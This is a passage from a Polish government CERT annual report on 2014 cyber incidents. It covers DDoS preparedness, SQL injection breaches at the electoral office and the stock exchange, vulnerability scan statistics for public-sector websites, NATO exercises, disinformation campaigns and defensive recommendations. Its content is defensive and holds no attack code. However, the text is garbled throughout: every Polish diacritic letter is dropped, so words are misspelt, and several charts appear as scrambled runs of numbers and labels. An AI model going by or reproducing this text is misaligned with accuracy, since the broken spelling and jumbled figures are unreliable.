W zwizku z czym, w razie ewentualnego ataku DDoS na stron instytucji, nie jest istotny jej
wewntrzny stan zabezpiecze, ale stan zabezpiecze oferowanych przez usugodawc
w ramach zawartej umowy. Niezwykle wane jest, w przypadku zlecania przedmiotowej
usugi na zewntrz, zarwno sprawdzenie czy podmiot dysponuje odpowiednimi zasobami
technicznymi dajcymi gwarancj odparcia ataku, jak i waciwe sformuowanie przedmiotu
umowy. Niestety, dostrzegalne nadal jest kierowanie si przy wyborze oferty, gwnie
kryterium najniszej ceny kosztem zabezpiecze m.in. uycia mechanizmw automatycznego
(oraz na danie) przeczania w zalenoci od poziomu wysycenia cza oraz obcienia
serwera formy wywietlania strony z dynamicznej na statyczn, czy te brak wprowadzania
odpowiedzialnoci firmy hostujcej za zapewnienie cigoci dziaania powierzonego serwisu.
38 / 58
CERT.GOV.PL

60,0%
50,0%
50,0%
40,0%
30,0%
23,7%
18,4%
20,0%
10,0%
7,9%
0,0%
Bardzo Wysoki
Wysoki
redni
Niski
Wykres 24. Zdolno odparcia ataku DDoS na witryn WWW na podstawie udzielonych odpowiedzi przez
instytucje na pytania i zalecenia Zespou CERT.GOV.PL
2.7. Krajowe Biuro Wyborcze

Zesp CERT.GOV.PL podejmowa dziaania w ramach swoich kompetencji, w odniesieniu do
wydarze majcych miejsce w trakcie samorzdowych wyborw w 2014 roku. KBW
poinformowane zostao o publicznie dostpnych w sieci Internet: serwerze testowym
systemu KBW, pozwalajcym na uzyskanie wiedzy na temat struktury bazy danych systemu.
Dodatkowo, podejmowane byy czynnoci wyjaniajce, w odniesieniu do informacji
o wycieku danych z systemw teleinformatycznych wykorzystywanych przez KBW oraz
upublicznieniu ich w sieci Internet tj. adresy e-mail, loginy, skrty kryptograficzne hase,
imiona i nazwiska.
Atak na serwery Krajowego Biura Wyborczego by atakiem typu SQL Injection. Polega on na
specjalnym spreparowaniu zapytania kierowanego do serwera, tak aby wykona on
nieautoryzowany fragment kodu SQL, co w efekcie moe prowadzi do wycieku informacji
z bazy danych. Dziaanie takie jest moliwe w przypadku braku odpowiedniej walidacji
wprowadzanych/przesyanych przez uytkownikw parametrw do serwera, na ktrym
umiejscowiona jest strona WWW. Naley przy tym doda, e w trakcie ataku wykonano
kilkaset specjalnie spreparowanych zapyta przez adresy IP, ktre w wikszoci naleay do
sieci anonimizujcej TOR. Atakujcy podejmowali wielokrotne, nieskuteczne prby
przeamania zabezpiecze w celu uzyskania nieautoryzowanego dostpu do zasobw.
Zastosowanie si do rekomendacji Zespou CERT.GOV.PL pozwolioby na znaczne
zmniejszenie skutkw opisywanego ataku.
CERT.GOV.PL
39 / 58

2.8. Gieda Papierw Wartociowych w Warszawie

Poza opisanym wyej w pkt. 2.6 atakiem DDoS, Gieda Papierw Wartociowych musiaa si
zmierzy 23 padziernika 2014 roku z podmian strony www.gpwcatalyst.pl oraz
www.newconnect.pl. Na stronie www.gpwcatalyst.pl umieszczony zosta wizerunek
dihadystw oraz napis w jzyku angielskim TO BE CONTINUED.... W sieci Internet zostay
opublikowane wykradzione podczas wamania do systemu GPW archiwalne dane uywane
do logowania do Szkolnej Internetowej Gry Giedowej i symulatora giedowego GPW Trader.
W sumie upublicznione zostao cznie ok. 52 MB danych. W tym konkretnym przypadku
Zesp CERT.GOV.PL nawiza wspprac zarwno z GPW i CERT Polska jak i Komisj
Nadzoru Finansowego oraz Ministerstwem Finansw. Zlecone zostao pilne podjcie krokw
majcych na celu zmian upublicznionych danych we wszystkich posiadanych usugach.
Rwnie w tym przypadku wykorzystana zostaa luka SQL-Injection a do przeprowadzenia
ataku wykorzystana zostaa sie anonimizujca TOR.
40 / 58
CERT.GOV.PL
3. TESTY
BEZPIECZESTWA
ADMINISTRACJI PUBLICZNEJ
WITRYN
INTERNETOWYCH
Prowadzone przez Zesp CERT.GOV.PL badania stanu zabezpiecze stron internetowych

nalecych do instytucji administracji publicznej maj na celu okrelenie poziomu
bezpieczestwa aplikacji WWW instytucji publicznych, a take usunicie wykrytych
nieprawidowoci. W 2014 roku zidentyfikowane zostay 446 bdy w ramach przebadanych,
przez Zesp CERT.GOV.PL 34 witryn internetowych nalecych do 12 instytucji
pastwowych.
W trakcie badania witryn stwierdzono, e ok 18% z nich zawierao przynajmniej jedn
podatno, ktr naleao uzna za krytyczn dla bezpieczestwa serwera i publikowanych
na stronie treci. Na 14 z 34 przebadanych stron zabezpieczenia byy skuteczne i nie
stwierdzono w nich adnych powanych podatnoci.
18%
350
3%
13%
294
300
250
200
150
100
50
Wysoki
12
66%
Bardzo wysoki
82
58
Niski
Informacyjny
Bardzo wysoki
Wysoki
Niski
Informacyjny
Wykres 25. Statystyka wykrytych podatnoci w witrynach WWW nalecych do administracji publicznych,
wedug poziomu zagroenia
CERT.GOV.PL
41 / 58

30,2%
Podatnoci typu Cross Site Scripting
20,6%
Nieszyfrowany parametr _VIEWSTATE
15,9%
Nieaktualna wersja oprogramowania
12,7%
Podatnoci typu SQL Injection
7,9%
Wstrzyknicie nagwka HOST

Podatno w renegocjacji TLS1/SSL3
4,8%
Ominicie filtrw Web-Application Firewall
1,6%
Ujawnienie nazw uytkownikw oraz hase
1,6%
Podatno typu file inclusion
1,6%
Directory Traversal
1,6%
Brak szyfrowania hase w bazie danych
1,6%
Wykres 26. Procentowy rozkad najpowaniejszych bdw w witrynach WWW, nalecych do administracji
publicznej
25,8%
Nagwek informujcy o wersji serwera
10,3%
Wiadomo o bdzie w aplikacji
7,8%
Meta dane w opublikowanych dokumentach

Brak flag HttpOnly i Secure dla ciasteczek
5,8%
Potencjalnie wraliwe pliki
5,6%
Potencjalnie wraliwe katalogi

Brak ochrony przeciw atakom typu Clickjacking
4,3%
3,8%
Nieszyfrowany parametr _VIEWSTATE
2,9%
Podatno typu bdny odsyacz
2,7%
Podatnoci typu Cross Site Scripting
2,7%
Wykres 27. Procentowy rozkad 10 najczciej wystpujcych bdw w witrynach WWW, nalecych do
administracji publicznej
Wrd podatnoci o wysokim lub bardzo wysokim poziomie zagroenia niezmiennie

przewaaj bdy typu SQL Injection oraz Cross Site Scripting17. Istotnym problemem jest
rwnie wykorzystywanie w serwerach produkcyjnych nieaktualnych wersji
oprogramowania. Na jednej z badanych stron wykorzystanie podatnoci SQL Injection
skutkowao bezporednim, zdalnym i nieautoryzowanym dostpem do hase uytkownikw
przechowywanych w bazie danych w postaci niezaszyfrowanej. W nielicznych przypadkach
rwnie przy wykorzystaniu podatnoci SQL Injection uytkownik by w stanie wykona
17
Od 2014 roku nastpio przekwalifikowanie podatno Cross Site Scripting (XSS) wedug poziomu zagroenia
z poziomu bardzo wysoki na wysoki.
42 / 58
CERT.GOV.PL

wasne zapytanie w bazie danych skutkujce np. dodaniem, modyfikacj lub usuniciem
rekordw w ramach posiadanych przez uytkownika bazy danych uprawnie. Skutkiem
udanego ataku by peny dostp do bazy danych na uprawnieniach administratora,
posiadajcego nieograniczone moliwoci w zakresie zarzdzania baz danych. W efekcie
atakujcy mg w zdalny sposb przetwarza zgromadzone w bazie informacje,
w szczeglnoci odczytywa je, modyfikowa i usuwa.
Stan bezpieczestwa przebadanych stron WWW
Ilo stron
Bardzo dobry
14
redni
14
Niski
Tabela 3. Stan bezpieczestwa stron WWW, nalecych do administracji publicznej
12
451
451
40
269
269
188
188
68
20
68
20
419
320
391
93 strony
244
33
33
391
458
244
2011
952011
stron
95 stron
58
58
294
82
458
244
346
2010
932010
strony
244
340
40
440
346
12
2012
612012
stron
61 stron
2013
452013
stron
45 stron
82
2014
34 2014
strony
34 strony
informacyjny Niskiwysoki
wysoki
Informacyjny
Wysoki bardzo
Bardzo
wysoki
Wykres 28. Liczbowy rozkad podatnoci przeskanowanych stron z podziaem na istotno bdw
w porwnaniu z poprzednimi latami
CERT.GOV.PL
43 / 58

Instytucje, ktrych witryny zostay przebadane, zostay poinformowane o wynikach,

wykrytych podatnociach istniejcych w ich systemach i poinstruowane jak podatnoci te
usun. Widoczny na powyszym wykresie spadek iloci przebadanych witryn zwizany jest
z kilkoma czynnikami jak m.in. wydueniem procesu przeprowadzania miarodajnych testw
w zwizku ze znacznym rozbudowaniem struktury serwisw, czy wprowadzeniem przez firmy
prywatne do oferty skierowanej dla administracji rzdowej przedmiotowej usugi, a take
zaangaowania Zespou w pilniejsze zadania.
44 / 58
CERT.GOV.PL
4. WSPPRACA KRAJOWA I MIDZYNARODOWA

4.1. Udzia w pracach nad dokumentami strategicznymi
Istotnymi pracami podejmowanymi w zakresie wsppracy krajowej i midzynarodowej byy
dziaania ukierunkowane na podnoszenie poziomu kompetencji osb odpowiedzialnych za
cyberbezpieczestwo. Przedstawiciele Zespou CERT.GOV.PL z ramienia Agencji
Bezpieczestwa Wewntrznego brali take udzia, w ramach Strategicznego Forum
Bezpieczestwa, w pracach nad przygotowywanym przez Biuro Bezpieczestwa Narodowego
dokumentem Doktryna Cyberbezpieczestwa Rzeczypospolitej Polskiej, a take
w posiedzeniach Zespou Zadaniowego do spraw bezpieczestwa cyberprzestrzeni
Rzeczypospolitej Polskiej, powoanego 13 czerwca 2014 roku decyzj Przewodniczcego
Komitetu Rady Ministrw do spraw Cyfryzacji.
W zwizku z toczc si dyskusj nad ewentualnymi ramami i form wsppracy operacyjnej
krajowych zespow reagowania na incydenty komputerowe, ktra ma by regulowana
w projekcie dyrektywy Parlamentu Europejskiego i Rady w sprawie rodkw majcych na
celu zapewnienie wsplnego wysokiego poziomu bezpieczestwa sieci i informacji w obrbie
Unii (dyrektywa NIS), przedstawiciele Zespou CERT.GOV.PL wzili udzia w zorganizowanym
przez Prezydencj Wosk w lipcu 2014 roku spotkaniu przedstawicieli CERTw z UE. Dyskusji
poddano rne kwestie na potrzeby projektu dyrektywy NIS m.in jak.: definicja znaczcego
incydentu transgranicznego, wskaniki, ktre mogyby zosta wykorzystane do okrelenia
potencjalnych ryzyk takich zagroe i podatnoci, ale rwnie moliwe formy wsppracy
CERTw na poziomie UE. W zwizku z tym, e Dyrektywa NIS ustanowi ma nowe ramy
prawne dla bezpieczestwa Internetu oraz sieci i systemw teleinformatycznych w Unii
Europejskiej, w tym kwestie m.in. CERTw narodowych i waciwych organw, czynny udzia
w dyskusji nad proponowanymi rozwizaniami jest niezwykle wany biorc pod uwag
przysz implementacj zapisw Dyrektywy NIS do porzdku krajowego.
4.2. wiczenia Locked Shields

Zwycistwem dla narodowego zespou wiczcego, w skad ktrego wchodzili
przedstawiciele Zespou CERT.GOV.PL, Ministerstwa Obrony Narodowej, Suby
Kontrwywiadu Wojskowego, Wojskowej Akademii Technicznej oraz CERT Polska zakoczyy
si wiczenia Locked Shields. Sukces by tym wikszy, e uczestniczyo prawie 300
przedstawicieli z 17
krajw reprezentujcych
najlepsze krajowe
zespoy
cyberbezpieczestwa. Scenariusz wicze zakada dziaania zespow obronnych
okrelonych jako Blue Teams w fikcyjnym kraju, ktrego infrastruktura teleinformatyczna
pada ofiar nasilajcych si atakw cybernetycznych dokonywanych przez umownego
napastnika tj. Red Teams. Locked Shields s wiczeniami w obszarze bezpieczestwa
sieciowego organizowanymi przez Centrum Doskonalenia Cyberobrony NATO w Talinie
CERT.GOV.PL
45 / 58

(NATO Cooperative Cyber Defence Centre of Excellence) we wsppracy z Estoni.
4.3. wiczenia Cyber Coalition 2014

Zesp CERT.GOV.PL uczestniczy take w sidmej edycji wicze NATO Cyber Coalition 2014,
realizowanych w ramach podnoszenia zdolnoci do cyberobrony krajw czonkowskich oraz
partnerskich NATO, ktre odbyy si w listopadzie 2014 roku. Po raz pierwszy,
obserwatorami wicze byli przedstawiciele przemysu i rodowisk akademickich. Celem
wicze jest testowanie zdolnoci krajw czonkowskich NATO i partnerw do dziaa
w zakresie cyberobrony w obszarze decyzyjnym, operacyjnym i technicznym. Przygotowane
scenariusze zakaday wystpienie ukierunkowanych atakw na infrastruktur
teleinformatyczn wiczcych krajw. Ocenie podlegaa koordynacja reagowania na
incydenty, prowadzenie analizy ich wystpienia w aspekcie technicznym, podejmowanie
decyzji sytuacyjnych a take konieczno wymiany informacji pomidzy uczestniczcymi
krajami. Cz scenariuszy bya rozgrywana w rodowisku wirtualnym pozwalajcym na
symulowanie incydentw w duej skali oraz wykorzystanie dedykowanych narzdzi
analitycznych.
Udzia w wiczeniach pozwoli Zespoowi CERT.GOV.PL na sprawdzenie moliwoci dziaania
w zakresie reagowania na incydenty we wsppracy z innymi zespoami reagowania krajw
NATO oraz na wzmocnienie kompetencji w zakresie prowadzenia analizy powamaniowej
wykrywanych incydentw.
4.4. Szkolenia krajowe

Analogicznie jak w poprzednich latach, rwnie w 2014 roku odbya si kolejna edycja
bezpatnego szkolenia dla administratorw systemw teleinformatycznych administracji
pastwowej. Szkolenia oferowane s na podstawie wsppracy Agencji Bezpieczestwa
Wewntrznego z firm Microsoft w zakresie bezpieczestwa teleinformatycznego w ramach
programu SCP (Security Cooperation Program).
Szkolenie dotyczyo kwestii zakoczenia wsparcia dla Windows Server 2003. Przedstawione
zostay take bezpieczestwo rodziny Windows Server, narzdzia oceny zabezpiecze
w Windows Server 2008 R2, praktyczne aspekty ochrony rodowisk serwerowych Windows
oraz rekomendowane zasady bezpieczestwa w rodowisku domeny Windows.
Realizujc zapisy Polityki Ochrony Cyberprzestrzeni RP Zesp CERT.GOV.PL, we wsppracy
z Ministerstwem Administracji i Cyfryzacji (MAiC), przeprowadzi szkolenie w zakresie
podnoszenia bezpieczestwa jawnych systemw teleinformatycznych, w ktrym do udziau
zaproszone zostay wydelegowane przez instytucje administracji rzdowej osoby
odpowiedzialne za reagowanie na incydenty komputerowe. Szkolenie obejmowao
praktyczne kwestie zwizane z funkcj koordynacyjn Zespou CERT.GOV.PL tj. formy
46 / 58
CERT.GOV.PL

i zasady obustronnej wsppracy pomidzy administratorami a Zespoem CERT.GOV.PL,
omwienie zalece CERT.GOV.PL w zakresie m.in. zapewnienia bezpieczestwa
teleinformatycznego instytucji i podnoszenia zdolnoci do odpierania atakw DDoS na
witryny WWW, katalogu zagroe oraz omwienie najczciej spotykanych podatnoci
i zagroe na podstawie przykadowych incydentw.
Zesp CERT.GOV.PL uczestniczy rwnie w zorganizowanym przez Ministerstwo
Administracji i Cyfryzacji, szkoleniu osb, ktrym zgodnie z zapisami Polityki Ochrony
Cyberprzestrzeni RP zostay przypisane zadania penomocnikw ds. bezpieczestwa
cyberprzestrzeni. Komponent dotyczcy bezpieczestwa w cyberprzestrzeni obecny by te
w szkoleniach z zakresu profilaktyki kontrwywiadowczej realizowanych przez ABW.
Wyej wymienione szkolenia, poza przekazaniem uczestnikom praktycznych informacji
dotyczcych
wsppracy
z
Zespoem
CERT.GOV.PL,
wymian
dowiadcze,
rozpowszechnianiem dobrych praktyk, miay rwnie na celu umoliwienie tworzenia si
powiza poziomych pomidzy uczestnikami Krajowego Systemu Reagowania na Incydenty
Komputerowe w CRP.
CERT.GOV.PL
47 / 58

5. NOWE TRENDY WOJNA INFORMACYJNA

Internet i media spoecznociowe z jednej strony daj moliwo szybkiego
rozpowszechnienia informacji i interakcji: publikujcych z Internautami. Z drugiej jednak
strony, ze wzgldu na dostpno i atwo korzystania z powyszych udogodnie staj si
take narzdziem stosowanym, do wspomagania militarnych i wywiadowczych dziaa
prowadzonych przez pastwa, poprzez uskutecznianie szeroko rozumianej akcji
propagandowo-dezinformacyjnej. W tym celu, wykorzystywane s osoby, ktre mona
przypisa do nastpujcych grup:
osoby dziaajce na zlecenie, otrzymujce wynagrodzenie za wykonan prac tj.

zamieszczania wpisw, komentarzy ukazujcych odpowiednie osoby i wydarzenia
w pozytywnym wietle wykorzystujc do tego, wybrane i przywoane
w odpowiednim kontekcie zmodyfikowane fakty;
tzw. useful idiots osoby prowadzce profile na portalach spoecznociowych, czy te
blogi osobiste, na ktrych zamieszczane s "podane" teksty, ale take inne osoby
inspirowane do powielania dezinformacji.
"Podane" informacje i komentarze pisane s wedug podobnego szablonu, zwykle maj

obszern tre i s wysoko oceniane przez innych "uytkownikw". Opinie stojce w opozycji
do treci zleconych s le oceniane przez kolejnych "dyskutantw". Wpisy w znacznym
stopniu s kopi poprzednich, zamieszczanych na innych portalach, czsto w niewielkim,
sekundowym odstpie czasu. Z czasem tego typu publikacje zaczy by formuowane
poprawn polszczyzn.
Niestety wiele osb bezwiednie staje si uczestnikiem potyczki, ktra zwykle rozgrywana jest
w ramach komentowania artykuw znajdujcych si na oglnodostpnych i popularnych
portalach internetowych. Analiza dyskusji internetowych (rwnie w sieciach
spoecznociowych) na przestrzeni ostatniego roku wskazaa na gwatowny i nienaturalny
w stosunku do innych tematw wzrost aktywnoci Internautw w tym zakresie, a take
zjawiska tzw. trollingu w komentowaniu dziaa Federacji Rosyjskiej zwizanych z aneksj
Krymu i konfliktem na Ukrainie. Tego typu wpisy dosownie "zaleway" polskie portale
informacyjne w pocztkowej fazie konfliktu. O tym, e opisywana dziaalno prorosyjskich
komentatorw ma charakter zorganizowany mog wiadczy dwa niezalene dziennikarskie
ledztwa pierwsze z 2013 roku przeprowadzone przez wydawnictwo Novaja Gazieta
i portal MR7.ru oraz z 2014 roku przeprowadzone przez portal Sobaka.ru, dotyczce
dziaalnoci firmy z Sankt Petersburga, zaoonej oficjalnie w celu wprowadzania do sieci
komentarzy dotyczcych produktw i usug, a w praktyce zatrudniajcej znaczn liczb
pracownikw (wedug tych dziennikarzy sezonowo nawet do 600 osb), ktrych zadaniem
48 / 58
CERT.GOV.PL

jest umieszczanie prokremlowskich komentarzy na rosyjskich i zagranicznych stronach
internetowych.
Due znaczenie w tym kontekcie ma upublicznianie rwnolegle przykadw wystpowania
wojny informacyjnej i opisywanie mechanizmw w niej wykorzystywanych. Gwn rol tutaj
odgrywaj niezaleni Internauci. W zwizku z czym zarekomendowa mona uytkownikom
sieci Internet zachowanie ostronoci i wyczulenie na prby wcignicia w zaplanowane
i sterowane dyskusje, a nawet ignorowanie tego rodzaju "zaczepek" na forach i portalach
spoecznociowych, bowiem zdarzy si moe, e nie prowadzimy sporu z rzeczywistym
czowiekiem a specjalnie stworzonym do powyszych celw programem komputerowym.
Nawizywanie interakcji moe by te wstpnym elementem przygotowania innych
niewaciwych dziaa w cyberprzestrzeni.
Warto pamita te, e autorom tych dziaa zaley na jak najwikszym rozgosie i czsto s
oni wynagradzani za ilo reakcji czy odpowiednio publikowanych treci, niezalenie czy
spotka si to z przyjciem pozytywnym czy negatywnym. Duym rozczarowaniem autorw
tego typu dezinformacji byoby powszechne ignorowanie ich publikacji.
CERT.GOV.PL
49 / 58

6. PODSUMOWANIE ORAZ ZALECENIA I REKOMENDACJE

Rok 2014 pod wzgldem liczby otrzymanych zgosze oraz obsuonych incydentw kolejny
raz okaza si dla Zespou CERT.GOV.PL rekordowy. Analogicznie do lat poprzednich
najwysze miejsce, w ramach zarejestrowanych incydentw, zajmuj botnety: w 2013 roku
zarejestrowanych zostao a 4270, a w 2014 roku 4681 przypadkw dotyczcych
zainfekowanych stacji roboczych bdcych skadnikami sieci botnet. Rwnie porwnujc
statystki systemu ARAKIS.GOV z rokiem 2013, mona zaobserwowa znaczny wzrost
ilociowy alarmw: rok 2013 18317, rok 2014 28322, z czego najwikszy wzrost
odnotowany zosta zarwno wrd tych o priorytecie wysokim i rednim.
Dostrzegalna jest take wyrana dynamika wzrostu uporczywych, dugofalowych atakw
bazujcych na zaawansowanych narzdziach. Oznacza to, e oprcz wzrostu ilociowego
obserwujemy take istotny postp jakociowy w prowadzonych atakach. Upraszczajc nie
do, e atakw jest wicej to mog one aktualnie by take znacznie groniejsze. Istotnym
czynnikiem pozostaje tu udzia grup kierowanych i sponsorowanych przez obce pastwa.
Warto podkreli, e Zesp CERT.GOV.PL odnotowa 119 incydentw okrelonych jako
inynieria spoeczna, co w porwnaniu do roku ubiegego stanowio wzrost o 350% (w 2013
roku zarejestrowanych zostao 34 incydentw bdcych sum kategorii: inynieria spoeczna,
kradzie tosamoci, podszycie si w tym Phishing).
Biorc pod uwag powysze, konieczne jest rozwijanie wsppracy instytucji z Zespoem
CERT.GOV.PL. Jako dobrze rokujce narzdzie mona przytoczy mechanizm wykorzystany
w reakcji na doniesienia o Energetic Bear, majcy na celu ograniczenie moliwoci eskalacji
zagroenia w sieciach i systemach, ktre mogyby zosta dotknite cyberkampani.
Obustronna wsppraca pozwolia, zarwno na weryfikacj przedstawionych informacji
w odniesieniu do skutecznoci cyberkampanii w Polsce, poszerzenie zebranej wiedzy na
temat jej skali, ale take pozwolio na ukierunkowanie dalszych dziaa w stosunku do innych
podmiotw, ktre mogy sta si przypadkowymi lub drugorzdnymi ofiarami
przedmiotowej kampanii.
Wydarzenia roku ubiegego potwierdzaj, jak kluczowa jest kwestia bezpieczestwa
systemw teleinformatycznych instytucji oraz znaczenie uwzgldniania koniecznoci
prowadzenia testw bezpieczestwa systemw i aplikacji przed ich wdroeniem, potem
okresowo kontynuowane na podstawie ustalonych zasad np. obligatoryjnie przed
wprowadzaniem znacznych zmian do sytemu. Wskaza rwnie naley, i znaczna cz
instytucji nie posiada polityki bezpieczestwa przeznaczonej dla jawnych systemw
teleinformatycznych, procedur na wypadek wystpienia incydentu TI, wskazanych jednostek
odpowiedzialnych za reagowanie na incydenty czy bezpieczestwo jawnych systemw, brak
jest te dedykowanego systemu szkole skierowanego do pracownikw. Przykady
incydentw, do ktrych doszo w 2014 roku jasno pokazuj, e wprowadzenie w ycie
50 / 58
CERT.GOV.PL

zalece Zespou CERT.GOV.PL znacznie ograniczyoby moliwo ich wystpienia lub
ewentualne skutki.
6.1. Zalecenia i rekomendacje dla instytucji

W zwizku z powyszym, celem osignicia minimalnego, akceptowalnego poziomu
bezpieczestwa systemw teleinformatycznych oraz dziaa majcych na celu ograniczenie
moliwoci eskalacji ewentualnego wystpienia zagroenia/podatnoci na inne jednostki
Zesp CERT.GOV.PL rekomenduje wprowadzenie niej wymienionych zalece skierowanych
do instytucji i firm.
Dziaania dorane:
Dostp do poczty wycznie z okrelonych adresw IP lub z wykorzystaniem rozwiza VPN:
ogranicza moliwo dostpu z niezaufanych komputerw oraz sieci anonimizujcych

(TOR);
zabezpiecza przed nieuprawnionym dostpem w przypadku kradziey loginw i hase;
uycie VPN dodatkowo zabezpiecza przed podsuchem danych.
Dostp do poczty wycznie z poziomu dedykowanego programu pocztowego:
ogranicza moliwo wykorzystania bdw w systemach dostpu do poczty przez

WWW;
zabezpiecza przed wykorzystaniem bdw w przegldarkach;
zabezpiecza przed popularnymi zoliwymi skryptami wykradajcymi dane.
Dostp do funkcji administracyjnych systemu pocztowego realizowany wycznie lokalnie:
uniemoliwia nieuprawniony dostp z sieci Internet;

w wysokim stopniu utrudnia przejcie konta o uprawnieniach administracyjnych;
zabezpiecza przed wykorzystaniem konta administracyjnego nawet przy kradziey
loginu i hasa.
Dostp do systemu obiegu dokumentw na takiej samej zasadzie jak do poczty:
ogranicza moliwo dostpu z niezaufanych komputerw oraz sieci anonimizujcych

(TOR);
zabezpiecza przed nieuprawnionym dostpem w przypadku kradziey loginw i hase;
uycie VPN dodatkowo zabezpiecza przed podsuchem danych.
Wprowadzenie na urzdzeniach sieciowych blokowania dostpu do zoliwych domen

i adresw:
ogranicza moliwo przypadkowego zainfekowania stacji roboczych;
CERT.GOV.PL
51 / 58

zabezpiecza przed skutecznym dziaaniem zoliwego oprogramowania uywajcego

znanych metod komunikacji;
zabezpiecza przed atakami ze znanych, zoliwych domen i adresw.
Wprowadzenie blokady bezporedniego dostpu stacji roboczych do sieci Internet:
umoliwia zablokowanie bezporedniego poczenia zoliwego oprogramowania

z sieci Internet;
utrudnia ominicie systemw zabezpiecze;
umoliwia kontrol dostpu i rozliczalno dziaa uytkownikw.
Usunicie, w miar moliwoci, rodowiska Java ze stacji roboczych (ewentualne

ograniczenie do stacji roboczych gdzie korzystanie z Javy jest niezbdne, z dbaoci
o aktualizacj). Jeeli jednak, ze wzgldu na funkcjonalno usunicie Javy nie jest aktualnie
moliwe uwzgldnienie tego postulatu przy modernizacji systemw:
Java jest jednym z najbardziej podatnym na ataki, powszechnie uywanym

oprogramowaniem;
ogranicza moliwo ataku z wykorzystaniem przegldarki internetowej;
blokuje dziaanie zoliwego oprogramowania wykorzystujcego t platform.
Prowadzenie analizy nieudanych prb logowania:
umoliwia wykrycie atakw brutalnych (ang. Brute force);

umoliwia wykrycie zainfekowanych stacji roboczych.
Wprowadzenie polityki uytkowania kont o wysokich uprawnieniach:
umoliwia skuteczne zarzdzanie kontami administratorw;

w wysokim stopniu utrudnia przejcia kont na serwerach;
uniemoliwia zoliwemu oprogramowaniu przejcie kont administratorw na
stacjach roboczych.
Przegld oprogramowania uytkowanego na stacjach roboczych w sieci jednostki

organizacyjnej:
umoliwia skuteczne zarzdzanie oprogramowaniem;

umoliwia przeprowadzenie audytw;
pozwala na stworzenie listy oprogramowania dopuszczonego do stosowania
w jednostce;
moe chroni przed wprowadzeniem do sieci lokalnej nieautoryzowanego
oprogramowania.
Dokonywanie testw bezpieczestwa w trybie okresowym, oraz obowizkowo przed

wdroeniem systemu lub wprowadzaniem istotnych zmian do niego.
52 / 58
CERT.GOV.PL

Dziaania docelowe
Oddzielenie systemu pocztowego od sieci produkcyjnej w jednostce:
utrudnia przypadkowe zainfekowanie systemw produkcyjnych;

pozwala na wdroenie systemu filtrujcego i analizujcego pliki wprowadzane do
sieci produkcyjnej;
udany atak wykorzystujcy poczt elektroniczn nie powoduje bezporedniego
zagroenia dla systemw produkcyjnych.
Wdroenie systemu identyfikacji w oparciu o certyfikaty elektroniczne:
uniemoliwia przejcie konta poprzez kradzie loginu i hasa;

pozwala na wdroenie penej rozliczalnoci uytkownikw;
pozwala na wdroenie szyfrowania informacji przez wszystkich uytkownikw.
Wdroenie centralnego systemu antywirusowego i antyspamowego:
uatwia zarzdzanie bezpieczestwem stacji roboczych i poczty zawsze aktualne

szczepionki;
pozwala na wykrywanie atakw socjotechnicznych o wikszej skali;
umoliwia ledzenie stanu bezpieczestwa antywirusowego stacji roboczych.
Wdroenie centralnego systemu korelacji danych:
umoliwia centralne zarzdzanie bezpieczestwem;

pozwala na wykrywanie atakw poprzez analiz anomalii;
umoliwia korelacj zdarze w rnych systemach teleinformatycznych.
Konfiguracja rodowisk izolowanych (tzw. "sandbox"):
pozwala na izolacj potencjalnie niebezpiecznych dokumentw;

w wysokim stopniu podwysza bezpieczestwo caej sieci w jednostce.
Identyfikacja kluczowych systemw w jednostce:
pozwala na objecie kluczowych systemw szczeglnymi mechanizmami ochrony;

umoliwia stworzenie szczegowych procedur ochrony, skupiajc specjaln uwag
na kluczowych systemach.
Ustanowienie w jednostce: zespou bezpieczestwa teleinformatycznego lub przypisanie

zada
konkretnym
pracownikom,
wprowadzenie
polityki
bezpieczestwa
teleinformatycznego uwzgldniajcej przejrzyst procedur zgaszania przez pracownikw
incydentw oraz reagowania na nie:
pozwala na cige monitorowanie stanu zabezpiecze sieci i systemw w jednostce;

umoliwia szybk reakcj w przypadku zaistnienia incydentu komputerowego;
CERT.GOV.PL
53 / 58

uatwia prowadzenie wewntrznych szkole podwyszajcych wiadomo

uytkownikw na temat zagroe pochodzcych z cyberprzestrzeni i metod im
zapobiegania.
Zalecenie dotyczce podnoszenia zdolnoci odpierania atakw DDoS

Rwnie majc na wzgldzie zadanie podnoszenia zdolnoci jednostek do odpierania
ewentualnych atakw DDoS na witryny Zesp CERT.GOV.PL rekomenduje wprowadzenie
poniej wymienionych zalece:
54 / 58
Przygotowanie planu reakcji, w instytucjach pastwowych, na ataki DDoS. Ujcie

Zespou CERT.GOV.PL w procedurach reagowania na incydenty komputerowe.
Wyznaczenie osb kontaktowych do nawizywania wsppracy z Zespoem
CERT.GOV.PL.
Systematyczne dokonywanie przegldu konfiguracji kluczowych urzdze sieciowych
znajdujcych si w infrastrukturze instytucji np. konfiguracja systemu DNS,
pozwalajca na szybk zmian rekordu NS w przypadku zaistnienia ataku.
Dokonanie przegldu infrastruktury sieciowej. Zlokalizowanie elementw
ograniczajcych transmisj. Wdroenie regu kontroli ruchu na urzdzeniach
brzegowych oraz systemach bezpieczestwa. Przygotowanie infrastruktury pod
ktem ewentualnego blokowania lub odrzucania niepodanego ruchu sieciowego
poprzez jego analiz i segregacj w oparciu o zadane reguy.
Wdroenie dedykowanych maszyn z systemami firewall (w tym take warstwy
aplikacji), IDS/IPS, monitoringu. W przypadku wystpienia ataku eliminacja ruchu
anonimizowanego (np. TOR, Open-Proxy, Anon-Proxy, Anon-VPN). Wymuszenie
cigej aktualizacji mechanizmw bezpieczestwa.
Wdroenie algorytmw rozkadania ruchu pomidzy wiele fizycznych lokalizacji
korzystajcych z danych zgromadzonych lokalnie (loadbalancing). W przypadku
duego obcienia atakowanej witryny posiadanie witryny w centrum zapasowym
(zalecana inna lokalizacja oraz dostawca cza internetowego).
Uycie mechanizmw automatycznego (oraz na danie) przeczania formy
wywietlania strony (strona dynamiczna strona statyczna informacja o przerwie
technicznej) w zalenoci od poziomu wysycenia cza oraz obcienia serwera
wiadczcego usugi publiczne, oraz okrelenie maksymalnego czasu, w ktrym
przeczenie powinno nastpi.
Przygotowanie umw z dostawc cza internetowego w sposb umoliwiajcy mu
podjcie bezporednich dziaa zmierzajcych do odparcia ewentualnego ataku.
W przypadku zlecenia wiadczenia usugi obsugi strony firmie zewntrznej zaleca si
przygotowanie odpowiednich zapisw w umowie umoliwiajcych jej podjcie
samodzielnych dziaa w celu zniwelowania zagroenia w przypadku jego
CERT.GOV.PL

wystpienia. Wprowadzenie odpowiedzialnoci firmy hostujcej za zapewnienie
cigoci dziaania powierzonego serwisu, a w przypadku operatora zapewniajcego
jedynie poczenie minimaln, gwarantowan przepustowo cza.
Katalog zagroe
Realizujc postanowienia dokumentu Polityka Ochrony Cyberprzestrzeni RP, Zesp
